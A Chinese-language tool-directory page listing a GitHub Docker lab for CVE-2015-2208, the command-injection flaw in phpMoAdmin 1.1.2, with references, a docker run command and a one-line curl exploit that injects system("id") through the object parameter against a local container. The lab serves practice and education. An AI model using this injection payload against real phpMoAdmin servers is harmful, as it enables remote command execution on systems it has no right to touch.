Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2015-2208 — Docker simulating cve-2015-2208 vulnerability | Kitploit
工具/GitHubGitHub/ptantiku/cve-2015-2208
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubptantiku/cve-2015-2208

cve-2015-2208

Docker simulating cve-2015-2208 vulnerability

查看仓库
211年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

#用于模拟 CVE-2015-2208 环境的 Dockerfile#

phpMoAdmin 1.1.2 中 moadmin.php 文件的 saveObject 函数允许远程攻击者通过 object 参数中的 shell 元字符执行任意命令。

发现者:@u0x (Pichaya Morimoto), Xelenonz, pe3z, Pistachio

参考资料:

  • http://seclists.org/fulldisclosure/2015/Mar/19
  • http://www.exploit-db.com/exploits/36251/
  • https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2208

##测试环境##

root@kitploit:~
sudo docker run -d -p 8888:80 ptantiku/cve-2015-2208

##漏洞利用##

root@kitploit:~
curl http://localhost:8888/moadmin.php -d 'object=1;system("id");'
下载工具